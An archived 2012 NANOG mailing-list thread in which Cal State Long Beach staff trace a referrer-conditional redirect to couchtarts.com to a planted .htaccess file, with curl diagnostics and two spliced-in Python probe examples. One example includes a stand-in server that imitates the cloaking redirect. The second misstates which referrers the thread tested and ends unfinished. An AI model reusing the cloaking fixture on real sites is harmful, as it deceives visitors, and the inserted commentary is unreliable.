The fun part will be figuring out how it got there. :)

Sent from my iPhone

On Jun 27, 2012, at 12:06 AM, Matthew Black  wrote:

> We found the aberrant .htaccess file and have removed it. What a mess!
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Grant Ridder [mailto:shortdudey...@gmail.com]
> Sent: Tuesday, June 26, 2012 11:02 PM
> To: Matthew Black; nanog@nanog.org
> Cc: Jeremy Hanmer
> Subject: Re: DNS poisoning at Google?
> 
> It also redirects with facebook, youtube, and ebay but NOT amazon.
> 
> -Grant
> 
> On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
> Our web lead was able to run curl. Thanks.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Grant Ridder [mailto:shortdudey...@gmail.com]
> Sent: Tuesday, June 26, 2012 10:53 PM
> To: Matthew Black
> Cc: Landon Stewart; nanog@nanog.org; Jeremy Hanmer
> 
> Subject: Re: DNS poisoning at Google?
> 
> Matt, what happens when you get on a subnet that can access the webservers 
> directly and bypass the load balancer?  Try curl then and see if it's 
> something w/ the webserver or load balancer.
> 
> -Grant
> On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
> Thanks again to everyone who helped. I didn't know what to enter with curl, 
> because Outlook clobbered the line breaks in Jeremy's original message.
> 
> Also, curl failed on our primary webserver because of firewall and load 
> balancer magic settings. The Telnet method worked better!
> 
> Our team is now scouring for that hidden redirect to couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 10:37 PM
> To: Matthew Black
> Cc: Jeremy Hanmer; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> There is definitely a 301 redirect.
> 
> $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> HTTP/1.1 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:36:31 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
> On 26 June 2012 22:05, Matthew Black <matthew.bl...@csulb.edu> wrote:
> Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which 
> redirect to the offending couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> 
> 
> 
> -Original Message-
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> It's not DNS.  If you're sure there's no htaccess files in place, check your 
> content (even that stored in a database) for anything that might be altering 
> data based on referrer.  This simple test shows what I mean:
> Airy:~ user$ curl -e 'http://google.com' csulb.edu
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> <html><head>
> <title>301 Moved Permanently</title>
> </head><body>
> <h1>Moved Permanently</h1>
> <p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
> </body></html>
> 
> Running curl without the -e argument gives the proper site contents.
> On Jun 26, 2012, at 9:24 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:
> 
>> Running Apache on three Solaris webservers behind a load balancer. No MS 
>> Windows!
>> 
>> Not sure how malicious software could get between our load balancer and Unix 
>> servers. Thanks for the tip!
>> 
>> matthew black
>> information technology services
>> california state university, long beach
>> 
>> 
>> 
>> From: Landon Stewart 
>> [mailto:lstew...@superb.net<

RE: DNS poisoning at Google?

2012-06-27 Thread Matthew Black
We found the aberrant .htaccess file and have removed it. What a mess!

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 11:02 PM
To: Matthew Black; nanog@nanog.org
Cc: Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

It also redirects with facebook, youtube, and ebay but NOT amazon.

-Grant

On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
Our web lead was able to run curl. Thanks.

matthew black
information technology services
california state university, long beach

From: Grant Ridder [mailto:shortdudey...@gmail.com]
Sent: Tuesday, June 26, 2012 10:53 PM
To: Matthew Black
Cc: Landon Stewart; nanog@nanog.org; Jeremy Hanmer

Subject: Re: DNS poisoning at Google?

Matt, what happens when you get on a subnet that can access the webservers directly 
and bypass the load balancer?  Try curl then and see if it's something w/ the 
webserver or load balancer.

-Grant
On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black <matthew.bl...@csulb.edu> wrote:
Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach

From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org
Subject: Re: DNS poisoning at Google?
There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1
On 26 June 2012 22:05, Matthew Black <matthew.bl...@csulb.edu> wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:
Airy:~ user$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>

Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu> wrote:

Re: DNS poisoning at Google?

2012-06-26 Thread Grant Ridder
It also redirects with facebook, youtube, and ebay but NOT amazon.

-Grant

On Wed, Jun 27, 2012 at 12:57 AM, Matthew Black wrote:

>  Our web lead was able to run curl. Thanks.
>
> matthew black
>
> information technology services
>
> california state university, long beach
>
> *From:* Grant Ridder [mailto:shortdudey...@gmail.com]
> *Sent:* Tuesday, June 26, 2012 10:53 PM
> *To:* Matthew Black
> *Cc:* Landon Stewart; nanog@nanog.org; Jeremy Hanmer
>
> *Subject:* Re: DNS poisoning at Google?
>
> Matt, what happens when you get on a subnet that can access the webservers
> directly and bypass the load balancer?  Try curl then and see if it's
> something w/ the webserver or load balancer.
>
> -Grant
>
> On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black 
> wrote:
>
> Thanks again to everyone who helped. I didn't know what to enter with
> curl, because Outlook clobbered the line breaks in Jeremy's original
> message.
>
> Also, curl failed on our primary webserver because of firewall and load
> balancer magic settings. The Telnet method worked better!
>
> Our team is now scouring for that hidden redirect to couchtarts.
>
>
> matthew black
> information technology services
> california state university, long beach
>
>
> 
>
> From: Landon Stewart [mailto:lstew...@superb.net]
>
> Sent: Tuesday, June 26, 2012 10:37 PM
> To: Matthew Black
> Cc: Jeremy Hanmer; nanog@nanog.org
>
> Subject: Re: DNS poisoning at Google?
>
> There is definitely a 301 redirect.
>
> $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> HTTP/1.1 <http://www.csulb.edu/%0d%0aHTTP/1.1> 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:36:31 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
> On 26 June 2012 22:05, Matthew Black <matthew.bl...@csulb.edu> wrote:
> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which
> redirect to the offending couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
>
> -Original Message-
>
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
>
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> <html><head>
> <title>301 Moved Permanently</title>
> </head><body>
> <h1>Moved Permanently</h1>
> <p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
> </body></html>
>
> Running curl without the -e argument gives the proper site contents.
>
> On Jun 26, 2012, at 9:24 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:
>
> > Running Apache on three Solaris webservers behind a load balancer. No MS
> Windows!
> >
> > Not sure how malicious software could get between our load balancer and
> Unix servers. Thanks for the tip!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
>
> > From: Landon Stewart [mailto:lstew...@superb.net]
>
> > Sent: Tuesday, June 26, 2012 9:07 PM
> > To: Matthew Black
>
> > Cc: nanog@nanog.org
>
> > Subject: Re: DNS poisoning at Google?
> >
> > Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
>
> > On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> > malware. They claim our home page returns no results, but redirects users
> > to another compromised website couchtarts.com.
>
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to
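The referrer test from the thread, automated: an added example (not code from the thread or from any poster) that runs the `curl -e` check across Google plus the referrers Grant Ridder tried and reports every Referer that changes the answer, flagging off-site redirect targets. The stand-in server, its trigger list and its target host (`redirect-target.invalid`) are constructed for the demo; `probe()` works against any URL.

```python
import http.client
import http.server
import threading
from urllib.parse import urlparse

# Referrers from the thread (Google, plus the ones Grant Ridder tried).
REFERRERS = (
    "http://www.google.com/",
    "http://www.facebook.com/",
    "http://www.youtube.com/",
    "http://www.ebay.com/",
    "http://www.amazon.com/",
)


def fetch(url, referer=""):
    """One GET without following redirects; returns (status, Location)."""
    u = urlparse(url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=5)
    headers = {"Referer": referer} if referer else {}
    try:
        conn.request("GET", u.path or "/", headers=headers)
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def offsite(url, location):
    """True when a redirect target names a different host, as the
    csulb.edu -> couchtarts.com redirect in the thread did."""
    if not location:
        return False
    target = urlparse(location).hostname
    return target is not None and target != urlparse(url).hostname


def probe(url, referrers=REFERRERS):
    """Compare each Referer's answer with a control request that sends no
    Referer.  Returns {referer: (status, location)} for every referrer
    whose answer differs; any entry is a sign of referrer-conditional
    cloaking, which a direct browser visit never shows."""
    control = fetch(url)
    findings = {}
    for ref in referrers:
        result = fetch(url, ref)
        if result != control:
            findings[ref] = result
    return findings


class CloakedHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the compromised server in the thread: a
    301 to an off-site page when the Referer names a trigger site, the
    real page otherwise.  Trigger list and target are made up."""
    TRIGGERS = ("google.", "facebook.", "youtube.", "ebay.")
    TARGET = "http://redirect-target.invalid/media.php"

    def do_GET(self):
        if any(t in self.headers.get("Referer", "") for t in self.TRIGGERS):
            self.send_response(301)
            self.send_header("Location", self.TARGET)
            self.end_headers()
            return
        body = b"<html><body>real homepage</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the server quiet; the probe report is the output


def start_fixture():
    """Serve CloakedHandler on a free loopback port; returns (server, url)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), CloakedHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/" % srv.server_address[1]


def demo():
    """Probe the stand-in server; returns (url, findings)."""
    srv, url = start_fixture()
    try:
        return url, probe(url)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    url, findings = demo()
    for ref, (status, loc) in sorted(findings.items()):
        flag = "  (off-site)" if offsite(url, loc) else ""
        print("%-26s -> %d Location: %s%s" % (ref, status, loc, flag))
```

Against the stand-in, four of the five referrers get the 301 and amazon.com gets the real page, the same pattern the thread reported; the control request is what a plain browser visit or a scanner without a Referer sees.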

Re: DNS poisoning at Google?

2012-06-26 Thread Jason Hellenthal


On Tue, Jun 26, 2012 at 10:36:55PM -0700, Landon Stewart wrote:
> There is definitely a 301 redirect.
> 
> $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> HTTP/1.1 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:36:31 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
> 

And if you visit http://www.couchtarts.com/media.php using the correct
browser you end up back at http://google.com ...


> On 26 June 2012 22:05, Matthew Black  wrote:
> 
> > Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> > redirecting anywhere.
> > They also report problems with some 48 other primary sites, none of which
> > redirect to the offending couchtarts.
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> >
> >
> > -Original Message-
> > From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> > Sent: Tuesday, June 26, 2012 9:58 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org
> > Subject: Re: DNS poisoning at Google?
> >
> > It's not DNS.  If you're sure there's no htaccess files in place, check
> > your content (even that stored in a database) for anything that might be
> > altering data based on referrer.  This simple test shows what I mean:
> >
> > Airy:~ user$ curl -e 'http://google.com' csulb.edu
> > <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> > <html><head>
> > <title>301 Moved Permanently</title>
> > </head><body>
> > <h1>Moved Permanently</h1>
> > <p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
> > </body></html>
> >
> > Running curl without the -e argument gives the proper site contents.
> >
> > On Jun 26, 2012, at 9:24 PM, Matthew Black 
> > wrote:
> >
> > > Running Apache on three Solaris webservers behind a load balancer. No MS
> > Windows!
> > >
> > > Not sure how malicious software could get between our load balancer and
> > Unix servers. Thanks for the tip!
> > >
> > > matthew black
> > > information technology services
> > > california state university, long beach
> > >
> > >
> > >
> > > From: Landon Stewart [mailto:lstew...@superb.net]
> > > Sent: Tuesday, June 26, 2012 9:07 PM
> > > To: Matthew Black
> > > Cc: nanog@nanog.org
> > > Subject: Re: DNS poisoning at Google?
> > >
> > > Is it possible that some malicious software is listening and injecting a
> > redirect on the wire?  We've seen this before with a Windows machine being
> > infected.
> > > On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu> wrote:
> > > Google Safe Browsing and Firefox have marked our website as containing
> > > malware. They claim our home page returns no results, but redirects users
> > > to another compromised website couchtarts.com.
> > >
> > > We have thoroughly examined our root .htaccess and httpd.conf files and
> > are not redirecting to the problem target site. No recent changes either.
> > >
> > > We ran some NSLOOKUPs against various public DNS servers and
> > intermittently get results that are NOT our servers.
> > >
> > > We believe the DNS servers used by Google's crawler have been poisoned.
> > >
> > > Can anyone shed some light on this?
> > >
> > > matthew black
> > > information technology services
> > > california state university, long beach
> > > www.csulb.edu
> > >
> > >
> > >
> > > --
> > > Landon Stewart <lstew...@superb.net>
> > > Sr. Administrator
> > > Systems Engineering
> > > Superb Internet Corp - 888-354-6128 x 4199
> > > Web hosting and more "Ahead of the Rest": http://www.superbhosting.net
> > >
> >
> >
> >
> >
> >
> 
> 
> -- 
> Landon Stewart 
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199
> Web hosting and more "Ahead of the Rest": http://www.superbhosting.net

-- 

 - (2^(N-1))



Re: DNS poisoning at Google?

2012-06-26 Thread Grant Ridder
Matt, what happens when you get on a subnet that can access the webservers
directly and bypass the load balancer?  Try curl then and see if it's
something w/ the webserver or load balancer.

-Grant

On Wed, Jun 27, 2012 at 12:40 AM, Matthew Black wrote:

> Thanks again to everyone who helped. I didn't know what to enter with
> curl, because Outlook clobbered the line breaks in Jeremy's original
> message.
>
> Also, curl failed on our primary webserver because of firewall and load
> balancer magic settings. The Telnet method worked better!
>
> Our team is now scouring for that hidden redirect to couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 10:37 PM
> To: Matthew Black
> Cc: Jeremy Hanmer; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> There is definitely a 301 redirect.
>
> $ curl -I --referer http://www.google.com/ http://www.csulb.edu/
> HTTP/1.1 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:36:31 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
> On 26 June 2012 22:05, Matthew Black <matthew.bl...@csulb.edu> wrote:
> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which
> redirect to the offending couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
>
> -Original Message-
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> <html><head>
> <title>301 Moved Permanently</title>
> </head><body>
> <h1>Moved Permanently</h1>
> <p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
> </body></html>
>
> Running curl without the -e argument gives the proper site contents.
> On Jun 26, 2012, at 9:24 PM, Matthew Black <matthew.bl...@csulb.edu> wrote:
>
> > Running Apache on three Solaris webservers behind a load balancer. No MS
> Windows!
> >
> > Not sure how malicious software could get between our load balancer and
> Unix servers. Thanks for the tip!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> > From: Landon Stewart [mailto:lstew...@superb.net]
> > Sent: Tuesday, June 26, 2012 9:07 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org
> > Subject: Re: DNS poisoning at Google?
> >
> > Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
> > On 26 June 2012 20:53, Matthew Black <matthew.bl...@csulb.edu> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> > malware. They claim our home page returns no results, but redirects users
> > to another compromised website couchtarts.com.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu
> >
> >
> >
> > --
> > Landon Stewart <lstew...@superb.net>
> > Sr. Administrator
> > Systems Engineering
> > Superb Internet Corp - 888-354-6128 x 4199
> > Web hosting and more "Ahead of the Rest": http://www.superbhosting.net
> >
>
>
>
>
>
>
> --
> Landon Stewart mailto:lstew...@superb.net>>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199
> Web hosting and more "Ahead of the Rest": http://www.superbhosting.net<
> http://www.superbhosting.net/>
>
>


RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach



From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org
Subject: Re: DNS poisoning at Google?

There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1

On 26 June 2012 22:05, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer 
[mailto:jeremy.han...@dreamhost.com<mailto:jeremy.han...@dreamhost.com>]
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org<mailto:nanog@nanog.org>
Subject: Re: DNS poisoning at Google?
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>


Running curl without the -e argument gives the proper site contents.
On Jun 26, 2012, at 9:24 PM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
>
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> From: Landon Stewart [mailto:lstew...@superb.net<mailto:lstew...@superb.net>]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: Re: DNS poisoning at Google?
>
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black 
> mailto:matthew.bl...@csulb.edu><mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>>>
>  wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website 
> couchtarts.com<http://couchtarts.com><http://couchtarts.com>.
>
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
>
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu><http://www.csulb.edu>
>
>
>
> --
> Landon Stewart 
> mailto:lstew...@superb.net<mailto:lstew...@superb.net>>>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199 Web 
> hosting and more "Ahead
> of the Rest":
> http://www.superbhosting.net<http://www.superbhosting.net/>
>






--
Landon Stewart mailto:lstew...@superb.net>>
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": 
http://www.superbhosting.net<http://www.superbhosting.net/>



Re: DNS poisoning at Google?

2012-06-26 Thread Landon Stewart
There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1

On 26 June 2012 22:05, Matthew Black  wrote:

> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which
> redirect to the offending couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
>
>
> -Original Message-
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu  "-//IETF//DTD HTML 2.0//EN"> 
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved http://www.couchtarts.com/media.php
> ">here.
> 
>
> Running curl without the -e argument gives the proper site contents.
>
> On Jun 26, 2012, at 9:24 PM, Matthew Black 
> wrote:
>
> > Running Apache on three Solaris webservers behind a load balancer. No MS
> Windows!
> >
> > Not sure how malicious software could get between our load balancer and
> Unix servers. Thanks for the tip!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> > From: Landon Stewart [mailto:lstew...@superb.net]
> > Sent: Tuesday, June 26, 2012 9:07 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org
> > Subject: Re: DNS poisoning at Google?
> >
> > Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
> > On 26 June 2012 20:53, Matthew Black  matthew.bl...@csulb.edu>> wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com<http://couchtarts.com>.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
> >
> >
> >
> > --
> > Landon Stewart mailto:lstew...@superb.net>>
> > Sr. Administrator
> > Systems Engineering
> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead
> > of the Rest":
> > http://www.superbhosting.net<http://www.superbhosting.net/>
> >
>
>
>
>
>


-- 
Landon Stewart 
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": http://www.superbhosting.net
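The curl -I --referer check above, carried further as an added example that is not part of the thread: a Python probe that repeats the request with no Referer, the search-engine referers the thread compares (Google, Bing, Yahoo) and an unrelated site, and reports which referers change the server's answer. The network fetch is injectable; `constructed_fetch` is a constructed stand-in mirroring the thread's observations so the script runs offline, and `http://placeholder.invalid/` is a placeholder URL.

```python
"""Referer-conditional redirect probe (added example, not code from the thread)."""
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

# Referers the thread compared: no referer, three search engines, an unrelated site.
REFERERS = [
    None,
    "http://www.google.com/",
    "http://www.bing.com/",
    "http://www.yahoo.com/",
    "http://blah.com/",
]

Response = Tuple[int, Optional[str]]  # (status code, Location header or None)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hand the 3xx back to the caller instead of following it (like curl without -L)."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url: str, referer: Optional[str]) -> Response:
    """HEAD the URL with an optional Referer header; never follow redirects."""
    req = urllib.request.Request(url, method="HEAD")
    if referer is not None:
        req.add_header("Referer", referer)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx arrive here
        return err.code, err.headers.get("Location")


def probe(url: str,
          fetch: Callable[[str, Optional[str]], Response] = http_fetch,
          referers=REFERERS) -> Dict[str, Response]:
    """Fetch the URL once per referer; returns {referer or "(none)": (status, location)}."""
    return {ref or "(none)": fetch(url, ref) for ref in referers}


def referer_dependent(results: Dict[str, Response]) -> Dict[str, Response]:
    """Referers whose answer differs from the no-referer baseline.

    An empty dict means the site answers the same whatever the Referer; anything
    else is the conditional behaviour the thread describes, and the place to look
    is rewrite rules, application code and stored content, not DNS.
    """
    baseline = results["(none)"]
    return {ref: resp for ref, resp in results.items() if resp != baseline}


def constructed_fetch(url: str, referer: Optional[str]) -> Response:
    """Constructed stand-in for the network, mirroring what the thread observed:
    search-engine referers get a 301 to the offending site, everything else a 200."""
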